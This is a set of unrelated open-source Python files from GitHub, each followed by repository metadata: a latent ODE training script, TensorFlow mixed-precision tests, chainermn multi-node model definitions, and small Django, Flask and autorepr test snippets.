#'_new_field_weak_private': 1,
                 # private fields defined outside the object's class are still visible
#'__new_field_class_private_incorrect': 0,
#'_Dummy__new_field_class_private': 1
]
else:
pairs = [('a', 'rhubarb'),
('b', ['pie', 'pie2']),
('c', 't'),
('_weak_private', 'r'),
('_FooConfigA__class_private', 't'), # <= this is the one private field that appears now
('new_field', 0),
('_new_field_weak_private', 1),
                 # private fields defined outside the object's class are still visible
('__new_field_class_private_incorrect', 0),
('_Dummy__new_field_class_private', 1)]
assert str(t) == format_pairs(FooConfigA, pairs)
@pytest.mark.parametrize("curly_mode", [False, True], ids="curly_mode={}".format)
def test_autorepr_pyfields(curly_mode):
"""tests that @autorepr works with pyfields"""
from pyfields import field
@autorepr
class Foo(object):
foo1 = field()
foo2 = field(default=0)
@autorepr(curly_string_repr=curly_mode)
class Bar(Foo):
bar = field()
# create an object manually
a = Bar()
a.bar = 2
a.foo1 = 'th'
    # field order in the repr follows declaration order in both modes
if curly_mode:
assert str(a) == "Bar(**{'foo1': 'th', 'foo2': 0, 'bar': 2})"
else:
assert str(a) == "Bar(foo1='th', foo2=0, bar=2)"
|
{
"content_hash": "32696d2c3befd3760b73d64ad9b1d57b",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 140,
"avg_line_length": 36.216981132075475,
"alnum_prop": 0.5425892159416514,
"repo_name": "smarie/python-classtools-autocode",
"id": "985bd52bcb8c72ee97d4c02c96450cdfb17f82a1",
"size": "3964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autoclass/tests/features/test_autorepr.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "60848"
}
],
"symlink_target": ""
}
|
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import time
import datetime
import argparse
import numpy as np
import pandas as pd
from random import SystemRandom
from sklearn import model_selection
import torch
import torch.nn as nn
from torch.nn.functional import relu
import torch.optim as optim
import lib.utils as utils
from lib.plotting import *
from lib.rnn_baselines import *
from lib.ode_rnn import *
from lib.create_latent_ode_model import create_LatentODE_model
from lib.parse_datasets import parse_datasets
from lib.ode_func import ODEFunc, ODEFunc_w_Poisson
from lib.diffeq_solver import DiffeqSolver
from mujoco_physics import HopperPhysics
from lib.utils import compute_loss_all_batches
# Generative model for noisy data based on ODE
parser = argparse.ArgumentParser('Latent ODE')
parser.add_argument('-n', type=int, default=100, help="Size of the dataset")
parser.add_argument('--niters', type=int, default=300)
parser.add_argument('--lr', type=float, default=1e-2, help="Starting learning rate.")
parser.add_argument('-b', '--batch-size', type=int, default=50)
parser.add_argument('--viz', action='store_true', help="Show plots while training")
parser.add_argument('--save', type=str, default='experiments/', help="Path for save checkpoints")
parser.add_argument('--load', type=str, default=None, help="ID of the experiment to load for evaluation. If None, run a new experiment.")
parser.add_argument('-r', '--random-seed', type=int, default=1991, help="Random_seed")
parser.add_argument('--dataset', type=str, default='periodic', help="Dataset to load. Available: physionet, activity, hopper, periodic")
parser.add_argument('-s', '--sample-tp', type=float, default=None, help="Number of time points to sub-sample."
	" If > 1, subsample exact number of points. If the number is in [0,1], take a percentage of available points per time series. If None, do not subsample")
parser.add_argument('-c', '--cut-tp', type=int, default=None, help="Cut out the section of the timeline of the specified length (in number of points)."
	" Used for periodic function demo.")
parser.add_argument('--quantization', type=float, default=0.1, help="Quantization on the physionet dataset."
	" Value 1 means quantization by 1 hour, value 0.1 means quantization by 0.1 hour = 6 min")
parser.add_argument('--latent-ode', action='store_true', help="Run Latent ODE seq2seq model")
parser.add_argument('--z0-encoder', type=str, default='odernn', help="Type of encoder for Latent ODE model: odernn or rnn")
parser.add_argument('--classic-rnn', action='store_true', help="Run RNN baseline: classic RNN that sees true points at every point. Used for interpolation only.")
parser.add_argument('--rnn-cell', default="gru", help="RNN Cell type. Available: gru (default), expdecay")
parser.add_argument('--input-decay', action='store_true', help="For RNN: use the input that is the weighted average of empirical mean and previous value (like in GRU-D)")
parser.add_argument('--ode-rnn', action='store_true', help="Run ODE-RNN baseline: RNN-style that sees true points at every point. Used for interpolation only.")
parser.add_argument('--rnn-vae', action='store_true', help="Run RNN baseline: seq2seq model with sampling of the h0 and ELBO loss.")
parser.add_argument('-l', '--latents', type=int, default=6, help="Size of the latent state")
parser.add_argument('--rec-dims', type=int, default=20, help="Dimensionality of the recognition model (ODE or RNN).")
parser.add_argument('--rec-layers', type=int, default=1, help="Number of layers in ODE func in recognition ODE")
parser.add_argument('--gen-layers', type=int, default=1, help="Number of layers in ODE func in generative ODE")
parser.add_argument('-u', '--units', type=int, default=100, help="Number of units per layer in ODE func")
parser.add_argument('-g', '--gru-units', type=int, default=100, help="Number of units per layer in each of GRU update networks")
parser.add_argument('--poisson', action='store_true', help="Model poisson-process likelihood for the density of events in addition to reconstruction.")
parser.add_argument('--classif', action='store_true', help="Include binary classification loss -- used for Physionet dataset for hospital mortality")
parser.add_argument('--linear-classif', action='store_true', help="If using a classifier, use a linear classifier instead of 1-layer NN")
parser.add_argument('--extrap', action='store_true', help="Set extrapolation mode. If this flag is not set, run interpolation mode.")
parser.add_argument('-t', '--timepoints', type=int, default=100, help="Total number of time-points")
parser.add_argument('--max-t', type=float, default=5., help="We subsample points in the interval [0, args.max_t]")
parser.add_argument('--noise-weight', type=float, default=0.01, help="Noise amplitude for generated trajectories")
args = parser.parse_args()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
file_name = os.path.basename(__file__)[:-3]
utils.makedirs(args.save)
#####################################################################################################
if __name__ == '__main__':
torch.manual_seed(args.random_seed)
np.random.seed(args.random_seed)
experimentID = args.load
if experimentID is None:
# Make a new experiment ID
experimentID = int(SystemRandom().random()*100000)
ckpt_path = os.path.join(args.save, "experiment_" + str(experimentID) + '.ckpt')
start = time.time()
print("Sampling dataset of {} training examples".format(args.n))
input_command = sys.argv
ind = [i for i in range(len(input_command)) if input_command[i] == "--load"]
if len(ind) == 1:
ind = ind[0]
input_command = input_command[:ind] + input_command[(ind+2):]
input_command = " ".join(input_command)
utils.makedirs("results/")
##################################################################
data_obj = parse_datasets(args, device)
input_dim = data_obj["input_dim"]
classif_per_tp = False
if ("classif_per_tp" in data_obj):
# do classification per time point rather than on a time series as a whole
classif_per_tp = data_obj["classif_per_tp"]
if args.classif and (args.dataset == "hopper" or args.dataset == "periodic"):
raise Exception("Classification task is not available for MuJoCo and 1d datasets")
n_labels = 1
if args.classif:
if ("n_labels" in data_obj):
n_labels = data_obj["n_labels"]
else:
raise Exception("Please provide number of labels for classification task")
##################################################################
# Create the model
obsrv_std = 0.01
if args.dataset == "hopper":
obsrv_std = 1e-3
obsrv_std = torch.Tensor([obsrv_std]).to(device)
z0_prior = Normal(torch.Tensor([0.0]).to(device), torch.Tensor([1.]).to(device))
if args.rnn_vae:
if args.poisson:
print("Poisson process likelihood not implemented for RNN-VAE: ignoring --poisson")
# Create RNN-VAE model
model = RNN_VAE(input_dim, args.latents,
device = device,
rec_dims = args.rec_dims,
concat_mask = True,
obsrv_std = obsrv_std,
z0_prior = z0_prior,
use_binary_classif = args.classif,
classif_per_tp = classif_per_tp,
linear_classifier = args.linear_classif,
n_units = args.units,
input_space_decay = args.input_decay,
cell = args.rnn_cell,
n_labels = n_labels,
train_classif_w_reconstr = (args.dataset == "physionet")
).to(device)
elif args.classic_rnn:
if args.poisson:
print("Poisson process likelihood not implemented for RNN: ignoring --poisson")
if args.extrap:
raise Exception("Extrapolation for standard RNN not implemented")
# Create RNN model
model = Classic_RNN(input_dim, args.latents, device,
concat_mask = True, obsrv_std = obsrv_std,
n_units = args.units,
use_binary_classif = args.classif,
classif_per_tp = classif_per_tp,
linear_classifier = args.linear_classif,
input_space_decay = args.input_decay,
cell = args.rnn_cell,
n_labels = n_labels,
train_classif_w_reconstr = (args.dataset == "physionet")
).to(device)
elif args.ode_rnn:
# Create ODE-GRU model
n_ode_gru_dims = args.latents
if args.poisson:
print("Poisson process likelihood not implemented for ODE-RNN: ignoring --poisson")
if args.extrap:
raise Exception("Extrapolation for ODE-RNN not implemented")
ode_func_net = utils.create_net(n_ode_gru_dims, n_ode_gru_dims,
n_layers = args.rec_layers, n_units = args.units, nonlinear = nn.Tanh)
rec_ode_func = ODEFunc(
input_dim = input_dim,
latent_dim = n_ode_gru_dims,
ode_func_net = ode_func_net,
device = device).to(device)
z0_diffeq_solver = DiffeqSolver(input_dim, rec_ode_func, "euler", args.latents,
odeint_rtol = 1e-3, odeint_atol = 1e-4, device = device)
model = ODE_RNN(input_dim, n_ode_gru_dims, device = device,
z0_diffeq_solver = z0_diffeq_solver, n_gru_units = args.gru_units,
concat_mask = True, obsrv_std = obsrv_std,
use_binary_classif = args.classif,
classif_per_tp = classif_per_tp,
n_labels = n_labels,
train_classif_w_reconstr = (args.dataset == "physionet")
).to(device)
elif args.latent_ode:
model = create_LatentODE_model(args, input_dim, z0_prior, obsrv_std, device,
classif_per_tp = classif_per_tp,
n_labels = n_labels)
else:
raise Exception("Model not specified")
##################################################################
if args.viz:
viz = Visualizations(device)
##################################################################
#Load checkpoint and evaluate the model
if args.load is not None:
utils.get_ckpt_model(ckpt_path, model, device)
exit()
##################################################################
# Training
log_path = "logs/" + file_name + "_" + str(experimentID) + ".log"
if not os.path.exists("logs/"):
utils.makedirs("logs/")
logger = utils.get_logger(logpath=log_path, filepath=os.path.abspath(__file__))
logger.info(input_command)
optimizer = optim.Adamax(model.parameters(), lr=args.lr)
num_batches = data_obj["n_train_batches"]
for itr in range(1, num_batches * (args.niters + 1)):
optimizer.zero_grad()
utils.update_learning_rate(optimizer, decay_rate = 0.999, lowest = args.lr / 10)
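		# KL annealing (describing the schedule below): the KL term is held at 0
		# for the first `wait_until_kl_inc` epochs, then its coefficient is ramped
		# toward 1 as 1 - 0.99**(epochs past the warm-up).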
wait_until_kl_inc = 10
if itr // num_batches < wait_until_kl_inc:
kl_coef = 0.
else:
			kl_coef = 1 - 0.99 ** (itr // num_batches - wait_until_kl_inc)
batch_dict = utils.get_next_batch(data_obj["train_dataloader"])
train_res = model.compute_all_losses(batch_dict, n_traj_samples = 3, kl_coef = kl_coef)
train_res["loss"].backward()
optimizer.step()
n_iters_to_viz = 1
if itr % (n_iters_to_viz * num_batches) == 0:
with torch.no_grad():
test_res = compute_loss_all_batches(model,
data_obj["test_dataloader"], args,
n_batches = data_obj["n_test_batches"],
experimentID = experimentID,
device = device,
n_traj_samples = 3, kl_coef = kl_coef)
message = 'Epoch {:04d} [Test seq (cond on sampled tp)] | Loss {:.6f} | Likelihood {:.6f} | KL fp {:.4f} | FP STD {:.4f}|'.format(
itr//num_batches,
test_res["loss"].detach(), test_res["likelihood"].detach(),
test_res["kl_first_p"], test_res["std_first_p"])
logger.info("Experiment " + str(experimentID))
logger.info(message)
logger.info("KL coef: {}".format(kl_coef))
logger.info("Train loss (one batch): {}".format(train_res["loss"].detach()))
logger.info("Train CE loss (one batch): {}".format(train_res["ce_loss"].detach()))
if "auc" in test_res:
logger.info("Classification AUC (TEST): {:.4f}".format(test_res["auc"]))
if "mse" in test_res:
logger.info("Test MSE: {:.4f}".format(test_res["mse"]))
if "accuracy" in train_res:
logger.info("Classification accuracy (TRAIN): {:.4f}".format(train_res["accuracy"]))
if "accuracy" in test_res:
logger.info("Classification accuracy (TEST): {:.4f}".format(test_res["accuracy"]))
if "pois_likelihood" in test_res:
logger.info("Poisson likelihood: {}".format(test_res["pois_likelihood"]))
if "ce_loss" in test_res:
logger.info("CE loss: {}".format(test_res["ce_loss"]))
torch.save({
'args': args,
'state_dict': model.state_dict(),
}, ckpt_path)
# Plotting
if args.viz:
with torch.no_grad():
test_dict = utils.get_next_batch(data_obj["test_dataloader"])
print("plotting....")
if isinstance(model, LatentODE) and (args.dataset == "periodic"): #and not args.classic_rnn and not args.ode_rnn:
plot_id = itr // num_batches // n_iters_to_viz
viz.draw_all_plots_one_dim(test_dict, model,
plot_name = file_name + "_" + str(experimentID) + "_{:03d}".format(plot_id) + ".png",
experimentID = experimentID, save=True)
plt.pause(0.01)
torch.save({
'args': args,
'state_dict': model.state_dict(),
}, ckpt_path)
|
{
"content_hash": "07858399d807dc5429ba3e4a12d66177",
"timestamp": "",
"source": "github",
"line_count": 325,
"max_line_length": 170,
"avg_line_length": 39.68923076923077,
"alnum_prop": 0.6692766881153578,
"repo_name": "YuliaRubanova/latent_ode",
"id": "f10533171fc2500396059377961b6d856c333f10",
"size": "13031",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "run_models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "148599"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import tf2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import test_util
from tensorflow.python.keras.mixed_precision.experimental import loss_scale_optimizer as loss_scale_optimizer_v2
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import gradient_descent as gradient_descent_v1
from tensorflow.python.training.experimental import loss_scale_optimizer as loss_scale_optimizer_v1
from tensorflow.python.training.experimental import mixed_precision
from tensorflow.python.training.experimental import mixed_precision_global_state
if tf2.enabled():
enable_mixed_precision_graph_rewrite = (
mixed_precision.enable_mixed_precision_graph_rewrite)
else:
enable_mixed_precision_graph_rewrite = (
mixed_precision.enable_mixed_precision_graph_rewrite_v1)
class MixedPrecisionTest(test.TestCase, parameterized.TestCase):
IGNORE_PERF_VAR = 'TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'
def setUp(self):
super(MixedPrecisionTest, self).setUp()
# Enable the tests to be run on pre-Volta GPUs by telling the grappler pass
# to ignore performance and always transform the graph.
self._original_ignore_perf_value = os.getenv(self.IGNORE_PERF_VAR)
os.environ[self.IGNORE_PERF_VAR] = '1'
def tearDown(self):
    # Set the IGNORE_PERF_VAR variable back to its original value.
if self._original_ignore_perf_value is not None:
os.environ[self.IGNORE_PERF_VAR] = self._original_ignore_perf_value
else:
del os.environ[self.IGNORE_PERF_VAR]
mixed_precision.disable_mixed_precision_graph_rewrite()
super(MixedPrecisionTest, self).tearDown()
@test_util.run_in_graph_and_eager_modes
def test_wrap_optimizer(self):
opt = gradient_descent_v1.GradientDescentOptimizer(1.0)
opt = enable_mixed_precision_graph_rewrite(opt, 123.)
self.assertIsInstance(
opt, loss_scale_optimizer_v1.MixedPrecisionLossScaleOptimizer)
self.assertEqual(self.evaluate(opt._loss_scale()), 123.)
opt = gradient_descent_v2.SGD(1.0)
opt = enable_mixed_precision_graph_rewrite(opt, 123.)
self.assertIsInstance(
opt, loss_scale_optimizer_v2.LossScaleOptimizer)
self.assertEqual(self.evaluate(opt._loss_scale()), 123.)
@test_util.run_in_graph_and_eager_modes
def test_optimizer_errors(self):
opt = 1
if tf2.enabled():
expected_regex = ('"opt" must be an instance of a '
'tf.keras.optimizers.Optimizer, but got')
else:
expected_regex = ('"opt" must be an instance of a tf.train.Optimizer or '
'a tf.keras.optimizers.Optimizer, but got')
with self.assertRaisesRegexp(ValueError, expected_regex):
enable_mixed_precision_graph_rewrite(opt)
self.assertFalse(config.get_optimizer_experimental_options()
.get('auto_mixed_precision', False))
opt = gradient_descent_v1.GradientDescentOptimizer(1.0)
opt = loss_scale_optimizer_v1.MixedPrecisionLossScaleOptimizer(opt,
'dynamic')
with self.assertRaisesRegexp(ValueError,
'"opt" must not already be an instance of a '
'MixedPrecisionLossScaleOptimizer.'):
enable_mixed_precision_graph_rewrite(opt)
self.assertFalse(config.get_optimizer_experimental_options()
.get('auto_mixed_precision', False))
opt = gradient_descent_v2.SGD(1.0)
opt = loss_scale_optimizer_v2.LossScaleOptimizer(opt, 'dynamic')
with self.assertRaisesRegexp(ValueError,
'"opt" must not already be an instance of a '
'LossScaleOptimizer.'):
enable_mixed_precision_graph_rewrite(opt)
self.assertFalse(config.get_optimizer_experimental_options()
.get('auto_mixed_precision', False))
@test_util.run_gpu_only
@test_util.run_in_graph_and_eager_modes
def test_grappler_pass_enabled(self):
opt = gradient_descent_v2.SGD(1.0)
enable_mixed_precision_graph_rewrite(opt, 123.)
var = variables.Variable([[1.0]])
def overflow_in_float16():
out = var * 2 ** 10
out = math_ops.matmul(out, out)
return array_ops.reshape(out, ())
if context.executing_eagerly():
f = def_function.function(overflow_in_float16)
self.assertEqual(f().numpy(), float('Inf'))
# Outside a def_function.function, the grappler pass will not be applied.
self.assertAlmostEqual(overflow_in_float16().numpy(), 2 ** 20)
# Test disabling mixed precision.
mixed_precision.disable_mixed_precision_graph_rewrite()
self.assertEqual(f().numpy(), 2 ** 20)
else:
with session.Session() as sess:
out = overflow_in_float16()
sess.run(var.initializer)
self.assertEqual(sess.run(out), float('Inf'))
# Test Session will enable the auto_mixed_precision grappler pass in a
# ConfigProto passed by the user
with session.Session(config=config_pb2.ConfigProto()) as sess:
out = overflow_in_float16()
sess.run(var.initializer)
self.assertEqual(sess.run(out), float('Inf'))
# Test disabling mixed precision.
mixed_precision.disable_mixed_precision_graph_rewrite()
with session.Session() as sess:
out = overflow_in_float16()
sess.run(var.initializer)
self.assertAlmostEqual(sess.run(out), 2 ** 20)
@test.mock.patch.object(tf_logging, 'warn')
def test_warn_if_session_already_exists(self, mock_warn):
# Set this to False, so Sessions created in previous tests do not trigger
# the warning.
mixed_precision_global_state.non_mixed_precision_session_created = False
with session.Session():
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
mock_warn.assert_any_call(
'You already have existing Sessions that do not use mixed precision. '
'enable_mixed_precision_graph_rewrite() will not affect these '
'Sessions.')
@test.mock.patch.object(tf_logging, 'warn')
def test_do_not_warn_if_session_does_not_already_exist(self, mock_warn):
# Set this to False, so Sessions created in previous tests do not trigger
# the warning.
mixed_precision_global_state.non_mixed_precision_session_created = False
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
with session.Session():
# Make sure the "You already have existing Sessions" warning was not
# issued, since the Session was only created after
# enable_mixed_precision_graph_rewrite.
for call_arg in mock_warn.call_args_list:
msg = call_arg[0][0]
self.assertNotIn('You already have existing Sessions that do not use '
'mixed precision', msg)
def test_error_if_policy_is_set(self):
with policy.policy_scope('infer_float32_vars'):
with self.assertRaisesRegexp(
ValueError, 'a keras mixed precision Policy has been set'):
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
    # Test no error is thrown when the policy is currently the default.
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
if __name__ == '__main__':
test.main()
|
{
"content_hash": "afa61ca19589ca43573d2ba3e96a319c",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 112,
"avg_line_length": 43.204301075268816,
"alnum_prop": 0.6961174713787954,
"repo_name": "DavidNorman/tensorflow",
"id": "2b03906660dac407a41e1c21e29b6a837003fab9",
"size": "8726",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/experimental/mixed_precision_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4913"
},
{
"name": "Batchfile",
"bytes": "15272"
},
{
"name": "C",
"bytes": "774469"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "74659044"
},
{
"name": "CMake",
"bytes": "6545"
},
{
"name": "Dockerfile",
"bytes": "79827"
},
{
"name": "Go",
"bytes": "1670422"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "827737"
},
{
"name": "Jupyter Notebook",
"bytes": "540800"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1004638"
},
{
"name": "Makefile",
"bytes": "66660"
},
{
"name": "Objective-C",
"bytes": "105247"
},
{
"name": "Objective-C++",
"bytes": "297569"
},
{
"name": "PHP",
"bytes": "23553"
},
{
"name": "Pascal",
"bytes": "3752"
},
{
"name": "Pawn",
"bytes": "14529"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37406546"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4706"
},
{
"name": "Shell",
"bytes": "452517"
},
{
"name": "Smarty",
"bytes": "31460"
},
{
"name": "Swift",
"bytes": "62814"
}
],
"symlink_target": ""
}
|
import logging
# Methods
from statsbiblioteket.github_cloner.github_cloner \
import \
github_backup, \
fetch_or_clone, \
get_github_repositories, \
parse_github_repositories, \
create_parser # This import is important for the sphinx-argparse docs
# Types
from statsbiblioteket.github_cloner.github_cloner import \
RepoType, \
UserType, \
Repository, \
Url, \
Path
__author__ = 'Asger Askov Blekinge'
__email__ = 'asger.askov.blekinge@gmail.com'
__version__ = '0.2.1rc'
logging.getLogger(__name__).addHandler(logging.NullHandler())
|
{
"content_hash": "6101679aef550de634f1774690db1358",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 74,
"avg_line_length": 24.166666666666668,
"alnum_prop": 0.6862068965517242,
"repo_name": "blekinge/github_cloner",
"id": "fd0cdf11d6ec397588e6de1133368e1cad4eff69",
"size": "673",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "statsbiblioteket/github_cloner/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "2669"
},
{
"name": "Python",
"bytes": "17228"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from .models import FacebookStatus, Subreddit, UserSubreddit
class FacebookStatusAdmin(admin.ModelAdmin):
list_display = ['__str__', 'author', 'status', 'publish_timestamp']
list_editable = ['status',]
list_filter = ['author', 'status', 'publish_timestamp']
admin.site.register(FacebookStatus, FacebookStatusAdmin)
admin.site.register(Subreddit)
admin.site.register(UserSubreddit)
|
{
"content_hash": "7ab8e8ae101372ce61fb07f9de47afb2",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 71,
"avg_line_length": 33,
"alnum_prop": 0.752913752913753,
"repo_name": "orlenko/FBBot",
"id": "012ef9b134a55e628d19a08e0e2151d0fea8ea47",
"size": "429",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/FBBot/fbposter/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "126"
},
{
"name": "JavaScript",
"bytes": "2775"
},
{
"name": "Python",
"bytes": "30632"
},
{
"name": "Shell",
"bytes": "29"
}
],
"symlink_target": ""
}
|
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route("/")
def hello():
return render_template("yatta.html")
if __name__ == "__main__":
app.run(debug=True)
|
{
"content_hash": "7a72da3ea8e12fc4c0a936d37d1c811b",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 40,
"avg_line_length": 18.727272727272727,
"alnum_prop": 0.6359223300970874,
"repo_name": "Tritlo/yatta-py",
"id": "cd8f8fad9b4ce4e5ea8f48949b1670884eb9515a",
"size": "206",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/yatta.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "93"
},
{
"name": "Makefile",
"bytes": "94"
},
{
"name": "Python",
"bytes": "652"
}
],
"symlink_target": ""
}
|
import chainer
import chainer.backends
from chainer.backends.cuda import cupy
import chainer.links as L
import chainer.testing
import chainermn
import numpy as np
import pytest
class Param(object):
def __init__(self, param):
self.dtype = None
self.__dict__.update(param)
params = [Param(p) for p in [
{
'dtype': np.float16,
}, {
'dtype': np.float32,
}, {
'dtype': chainer.mixed16
}]]
class Cycle0SubA(chainer.Chain):
def __init__(self, size):
super(Cycle0SubA, self).__init__()
with self.init_scope():
self.f = L.Linear(size, size)
def __call__(self, x):
return self.f(x)
class Cycle0SubB(chainer.Chain):
def __init__(self, size):
super(Cycle0SubB, self).__init__(
f=L.Linear(size, 2))
def __call__(self, h):
return self.f(h)
class Cycle0(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cycle0, self).__init__(comm=comm)
self.add_link(Cycle0SubA(size), rank_in=None, rank_out=rank_next)
self.add_link(Cycle0SubB(size), rank_in=rank_prev, rank_out=None)
class Cycle1Sub(chainer.Chain):
def __init__(self, size):
super(Cycle1Sub, self).__init__(
f=L.Linear(size, size))
def __call__(self, h):
return self.f(h)
class Cycle1(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cycle1, self).__init__(comm=comm)
self.add_link(Cycle1Sub(size), rank_in=rank_prev, rank_out=rank_next)
class Cross0(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cross0, self).__init__(comm=comm)
self.add_link(Cycle0SubA(size), rank_in=None, rank_out=rank_next)
self.add_link(Cycle0SubB(size), rank_in=rank_prev, rank_out=None)
class Cross1(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cross1, self).__init__(comm=comm)
self.add_link(Cycle0SubB(size), rank_in=rank_prev, rank_out=None)
self.add_link(Cycle0SubA(size), rank_in=None, rank_out=rank_next)
class BranchSubA(chainer.Chain):
def __init__(self, size):
super(BranchSubA, self).__init__(
f=L.Linear(size, size))
def __call__(self, x):
return self.f(x)
class BranchSubB(chainer.Chain):
def __init__(self, size):
super(BranchSubB, self).__init__(
f=L.Linear(size, size))
def __call__(self, *xs):
x = xs[0]
for _x in xs[1:]:
x = x + _x
return self.f(x)
class BranchParent1(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent1, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_children)
self.add_link(BranchSubB(size), rank_in=rank_children, rank_out=None)
class BranchParent2(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent2, self).__init__(comm=comm)
ranks = [comm.rank] + rank_children
self.add_link(BranchSubA(size), rank_in=None, rank_out=ranks)
self.add_link(BranchSubA(size), rank_in=comm.rank, rank_out=comm.rank)
self.add_link(BranchSubB(size), rank_in=ranks, rank_out=None)
class BranchParent3(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent3, self).__init__(comm=comm)
ranks = rank_children + [comm.rank]
self.add_link(BranchSubA(size), rank_in=None, rank_out=ranks)
self.add_link(BranchSubA(size), rank_in=comm.rank, rank_out=comm.rank)
self.add_link(BranchSubB(size), rank_in=ranks, rank_out=None)
class BranchParent4(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent4, self).__init__(comm=comm)
ranks = rank_children + [comm.rank]
ranks = ranks[1:] + ranks[0:1]
self.add_link(BranchSubA(size), rank_in=None, rank_out=ranks)
self.add_link(BranchSubA(size), rank_in=comm.rank, rank_out=comm.rank)
self.add_link(BranchSubB(size), rank_in=ranks, rank_out=None)
class BranchChild(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_parent):
super(BranchChild, self).__init__(comm=comm)
self.add_link(
BranchSubA(size),
rank_in=rank_parent,
rank_out=rank_parent)
class TwistFirst(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_next):
super(TwistFirst, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_next)
self.add_link(BranchSubA(size), rank_in=rank_next, rank_out=None)
class Twist(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Twist, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=rank_prev, rank_out=comm.rank)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_prev)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_next)
self.add_link(BranchSubA(size), rank_in=rank_next, rank_out=comm.rank)
self.add_link(
BranchSubB(size),
rank_in=[comm.rank, comm.rank],
rank_out=None)
class TwistLast(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev):
super(TwistLast, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=rank_prev, rank_out=None)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_prev)
class TupleDataSubA(chainer.Chain):
def __init__(self, size):
super(TupleDataSubA, self).__init__(
f0=L.Linear(size, size),
f1=L.Linear(size, size))
def __call__(self, x):
y0 = self.f0(x)
y1 = self.f1(x)
return y0, y1
class TupleDataSubB(chainer.Chain):
def __init__(self, size):
super(TupleDataSubB, self).__init__(
f0=L.Linear(size, size),
f1=L.Linear(size, size))
def __call__(self, x):
        # TupleDataSubB receives a two-element tuple from TupleDataSubA.
x0, x1 = x
y0 = self.f0(x0)
y1 = self.f1(x1)
return y0 + y1
class TupleDataSubC(chainer.Chain):
def __init__(self, size):
super(TupleDataSubC, self).__init__(
f=L.Linear(size, size))
def __call__(self, x):
return self.f(x)
class TupleDataParent(chainermn.MultiNodeChainList):
def __init__(self, comm, size, rank_child):
super(TupleDataParent, self).__init__(comm=comm)
self.add_link(TupleDataSubA(size), rank_in=None, rank_out=rank_child)
self.add_link(TupleDataSubC(size), rank_in=rank_child, rank_out=None)
class TupleDataChild(chainermn.MultiNodeChainList):
def __init__(self, comm, size, rank_parent):
super(TupleDataChild, self).__init__(comm=comm)
self.add_link(
TupleDataSubB(size), rank_in=rank_parent, rank_out=rank_parent)
def create_communicator(gpu):
if gpu:
communicator = chainermn.create_communicator('flat')
chainer.backends.cuda.get_device_from_id(communicator.intra_rank).use()
else:
communicator = chainermn.create_communicator('naive')
